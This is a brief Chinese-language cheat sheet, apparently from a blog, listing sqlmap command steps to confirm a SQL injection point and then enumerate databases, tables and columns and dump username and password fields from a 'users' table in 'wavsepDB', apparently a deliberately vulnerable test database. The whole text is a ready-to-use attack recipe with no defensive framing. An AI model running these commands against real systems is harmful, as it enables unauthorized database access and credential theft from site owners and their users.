sqlmap爆库

  1. 判断是否存在注入点
    -u “url” --batch

  2. 获取全部数据库
    -u “url” --dbs --batch

  3. 获取当前数据库
    -u “url” --current-db --batch

  4. 获取当前数据库里所有表
    -u “url” -D wavsepDB --tables --batch

  5. 获取表的字段
    -u “url” -D wavsepDB -T users --columns --batch

  6. 获取字段数据
    -u “url” -D wavsepDB -T users -C “password,username” --dump --batch
    (–start 1 --stop 100 这样就取1-100条数据)

你可能感兴趣的:(sqlmap爆库)